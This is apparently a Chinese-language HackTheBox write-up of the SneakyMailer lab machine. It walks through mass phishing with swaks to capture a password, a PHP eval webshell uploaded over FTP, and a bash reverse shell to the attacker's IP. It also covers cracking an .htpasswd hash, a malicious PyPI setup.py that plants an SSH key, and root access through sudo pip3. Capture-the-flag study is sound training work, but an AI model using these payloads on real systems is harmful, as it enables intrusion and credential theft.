SneakyMailer - HackTheBox

基本信息

• https://www.hackthebox.eu/home/machines/profile/262

• 10.10.10.197

端口扫描

$ nmap -sC -sV 10.10.10.197
Starting Nmap 7.80 ( https://nmap.org ) at 2020-07-22 12:35 CST
Nmap scan report for 10.10.10.197
Host is up (0.068s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE  VERSION
21/tcp   open  ftp      vsftpd 3.0.3
22/tcp   open  ssh      OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
|   2048 57:c9:00:35:36:56:e6:6f:f6:de:86:40:b2:ee:3e:fd (RSA)
|   256 d8:21:23:28:1d:b8:30:46:e2:67:2d:59:65:f0:0a:05 (ECDSA)
|_  256 5e:4f:23:4e:d4:90:8e:e9:5e:89:74:b3:19:0c:fc:1a (ED25519)
25/tcp   open  smtp     Postfix smtpd
|_smtp-commands: debian, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN, SMTPUTF8, CHUNKING,
80/tcp   open  http     nginx 1.14.2
|_http-server-header: nginx/1.14.2
|_http-title: Did not follow redirect to http://sneakycorp.htb
143/tcp  open  imap     Courier Imapd (released 2018)
|_imap-capabilities: UIDPLUS completed THREAD=ORDEREDSUBJECT OK CHILDREN ACL2=UNION SORT QUOTA STARTTLS ACL THREAD=REFERENCES NAMESPACE UTF8=ACCEPTA0001 IMAP4rev1 IDLE ENABLE CAPABILITY
| ssl-cert: Subject: commonName=localhost/organizationName=Courier Mail Server/stateOrProvinceName=NY/countryName=US
| Subject Alternative Name: email:postmaster@example.com
| Not valid before: 2020-05-14T17:14:21
|_Not valid after:  2021-05-14T17:14:21
|_ssl-date: TLS randomness does not represent time
993/tcp  open  ssl/imap Courier Imapd (released 2018)
|_imap-capabilities: UIDPLUS completed THREAD=ORDEREDSUBJECT OK CHILDREN ACL2=UNION SORT QUOTA THREAD=REFERENCES ACL AUTH=PLAIN NAMESPACE UTF8=ACCEPTA0001 IMAP4rev1 IDLE ENABLE CAPABILITY
| ssl-cert: Subject: commonName=localhost/organizationName=Courier Mail Server/stateOrProvinceName=NY/countryName=US
| Subject Alternative Name: email:postmaster@example.com
| Not valid before: 2020-05-14T17:14:21
|_Not valid after:  2021-05-14T17:14:21
|_ssl-date: TLS randomness does not represent time
8080/tcp open  http     nginx 1.14.2
|_http-open-proxy: Proxy might be redirecting requests
|_http-server-header: nginx/1.14.2
|_http-title: Welcome to nginx!
Service Info: Host:  debian; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 66.31 seconds

80

需要加hosts：

10.10.10.197 sneakycorp.htb

pypi提示可以在服务器上装module，这应该是拿到服务器后的利用点

Team那里可以得到一些邮箱，提取出来：

curl http://sneakycorp.htb/team.php | grep @sneakymailer.htb >> emails.txt
cat emails.txt | sed 's/<td>//g' | sed 's/<\/td>//g' | sed 's/ //g' > email.txt
cat email.txt

tigernixon@sneakymailer.htb
garrettwinters@sneakymailer.htb
ashtoncox@sneakymailer.htb
cedrickelly@sneakymailer.htb
airisatou@sneakymailer.htb
briellewilliamson@sneakymailer.htb
herrodchandler@sneakymailer.htb
rhonadavidson@sneakymailer.htb
colleenhurst@sneakymailer.htb
sonyafrost@sneakymailer.htb
jenagaines@sneakymailer.htb
quinnflynn@sneakymailer.htb
chardemarshall@sneakymailer.htb
haleykennedy@sneakymailer.htb
tatyanafitzpatrick@sneakymailer.htb
michaelsilva@sneakymailer.htb
paulbyrd@sneakymailer.htb
glorialittle@sneakymailer.htb
bradleygreer@sneakymailer.htb
dairios@sneakymailer.htb
jenettecaldwell@sneakymailer.htb
yuriberry@sneakymailer.htb
caesarvance@sneakymailer.htb
doriswilder@sneakymailer.htb
angelicaramos@sneakymailer.htb
gavinjoyce@sneakymailer.htb
jenniferchang@sneakymailer.htb
brendenwagner@sneakymailer.htb
fionagreen@sneakymailer.htb
shouitou@sneakymailer.htb
michellehouse@sneakymailer.htb
sukiburks@sneakymailer.htb
prescottbartlett@sneakymailer.htb
gavincortez@sneakymailer.htb
martenamccray@sneakymailer.htb
unitybutler@sneakymailer.htb
howardhatfield@sneakymailer.htb
hopefuentes@sneakymailer.htb
vivianharrell@sneakymailer.htb
timothymooney@sneakymailer.htb
jacksonbradshaw@sneakymailer.htb
olivialiang@sneakymailer.htb
brunonash@sneakymailer.htb
sakurayamamoto@sneakymailer.htb
thorwalton@sneakymailer.htb
finncamacho@sneakymailer.htb
sergebaldwin@sneakymailer.htb
zenaidafrank@sneakymailer.htb
zoritaserrano@sneakymailer.htb
jenniferacosta@sneakymailer.htb
carastevens@sneakymailer.htb
hermionebutler@sneakymailer.htb
laelgreer@sneakymailer.htb
jonasalexander@sneakymailer.htb
shaddecker@sneakymailer.htb
sulcud@sneakymailer.htb
donnasnider@sneakymailer.htb

25

25是smtp，根据靶机名以及得到的邮箱列表，可能的利用点

143

imap,邮件服务

SMTP钓鱼

考察点就是某个员工会点击钓鱼邮件链接，直接使用swaks：

while read mail; do swaks --to $mail --from it@sneakymailer.htb --header "Subject: Credentials /Errors" --body "goto http://10.10.14.4/" --server 10.10.10.197; done < email.txt

 nc -lvvp 80
Listening on any address 80 (http)
Connection from 10.10.10.197:51354
POST / HTTP/1.1
Host: 10.10.14.4
User-Agent: python-requests/2.23.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive
Content-Length: 185
Content-Type: application/x-www-form-urlencoded

firstName=Paul&lastName=Byrd&email=paulbyrd%40sneakymailer.htb&password=%5E%28%23J%40SkFv2%5B%25KhIxKk%28Ju%60hqcHl%3C%3AHt&rpassword=%5E%28%23J%40SkFv2%5B%25KhIxKk%28Ju%60hqcHl%3C%3AHt

钓鱼得到的内容解码后：

firstName=Paul&lastName=Byrd&email=paulbyrd@sneakymailer.htb&password=^(#J@SkFv2[%KhIxKk(Ju`hqcHl<:Ht&rpassword=^(#J@SkFv2[%KhIxKk(Ju`hqcHl<:Ht
UserName ： paulbyrd
email : paulbyrd@sneakymailer.htb
password : ^(#J@SkFv2[%KhIxKk(Ju`hqcHl<:Ht

很复杂的密码，然而直接钓鱼泄漏出来了。。。

SMTP认证

然后用一个邮箱客户端登录，我用的evolution，这里注意邮箱后缀域名加下hosts：

10.10.10.197 sneakycorp.htb sneakymailer.htb

然后在已发送邮件中发现一封password reset邮件：

Username: developer
Original-Password: m^AsY7vTKVT+dV1{WOU%@NaHkUAId3]C

子域名扫描

扫描子域名可以发现一个dev, 这个后面会用到：

gobuster vhost -w /usr/share/wordlists/seclists/Discovery/DNS/namelist.txt -u sneakycorp.htb
Found: dev.sneakycorp.htb (Status: 200) [Size: 13742]

FTP get webshell

上面得到的developer账号密码可以用于FTP,进去是一个dev目录，应该就是前面dev子域名的代码，我们可以直接传webshell：

➜  SneakyMailer cat miao.php
<?php eval(@$_GET['cmd']); ?>

ftp> put miao.php
local: miao.php remote: miao.php
227 Entering Passive Mode (10,10,10,197,106,218).
150 Ok to send data.
226 Transfer complete.
31 bytes sent in 0.00 secs (420.4644 kB/s)

reverse shell

bash -c 'bash -i >& /dev/tcp/10.10.14.4/7777 0>&1

developer

www-root切到developer：

pypi.sneakycorp.htb

在/var/www发现pypi.sneakycorp.htb，把这个也加到hosts访问, 注意直接访问是重定向到主站，需要8080端口：

.htpasswd

pypi目录有个.htpasswd文件,hashcat解出来pypi密码：

cat .htpasswd
pypi:$apr1$RV5c5YVs$U9.OTqF5n8K4mxWpSSR/p/

hashcat -m 1600 hash.txt /usr/share/wordlists/rockyou.txt
$apr1$RV5c5YVs$U9.OTqF5n8K4mxWpSSR/p/:soufianeelhaoui

 pypi: soufianeelhaoui

PyPI

现在我们有pypi的密码，就可以上传恶意的package执行代码，参考：

• https://pypi.org/project/pypiserver/#upload-with-setuptools

  整个流程就是通过pypi，执行python代码，将我们的公钥写到low用户的authorized_keys中，然后SSH连接

恶意package

cd /tmp
mkdir miaopkg
cd miaopkg
chmod 600 .pypirc

# 本机
ssh-keygen -b 2048 -t ed25519 -f ./key -q -N ""
ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIC6Ew9PQtpGf/0V00Yhu4XluLxoLh70CClimoc8IzuxI miao@miao

wget http://10.10.14.4:8888/.pypirc
wget http://10.10.14.4:8888/setup.py

# target /tmp/miaopkg
HOME=$(pwd)
python3 setup.py sdist register -r local upload -r local

.pypirc

[distutils]
index-servers =
 local
[local]
repository: http://pypi.sneakycorp.htb:8080
username: pypi
password: soufianeelhaoui

setup.py

import setuptools

try:
    with open("/home/low/.ssh/authorized_keys", "a") as f:
        f.write("\nssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIC6Ew9PQtpGf/0V00Yhu4XluLxoLh70CClimoc8IzuxI miao@miao")
    f.close()
except Exception as e:
    pass

setuptools.setup(
    name="miaopkg",  # Replace with your own username
    version="0.0.1",
    author="Example Author",
    author_email="author@example.com",
    description="A small example package",
    long_description="",
    long_description_content_type="text/markdown",
    url="https://github.com/pypa/sampleproject",
    packages=setuptools.find_packages(),
    classifiers=[
        "Programming Language :: Python :: 3",
        "License :: OSI Approved :: MIT License",
        "Operating System :: OS Independent",
    ],
)

user flag

SSH登录，得到user.txt:

提权信息

low@sneakymailer:~$ sudo -l

sudo: unable to resolve host sneakymailer: Temporary failure in name resolution
Matching Defaults entries for low on sneakymailer:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User low may run the following commands on sneakymailer:
    (root) NOPASSWD: /usr/bin/pip3

可以无需密码，以root权限运行/usr/bin/pip3，那基本就是通过pip3安装恶意模块

提权

参考：

• https://gtfobins.github.io/gtfobins/pip/

TF=$(mktemp -d)
echo "import os; os.execl('/bin/sh', 'sh', '-c', 'sh <$(tty) >$(tty) 2>$(tty)')" > $TF/setup.py
sudo pip3 install $TF

root flag

提权到root，读取root.txt:

参考资料

• https://pypi.org/project/pypiserver/#upload-with-setuptools
• https://gtfobins.github.io/gtfobins/pip/
• HacktheBox SneakyMailer 10.10.10.197 Writeup - BinaryBiceps
  https://binarybiceps.com/hackthebox-sneakymailer-writeup/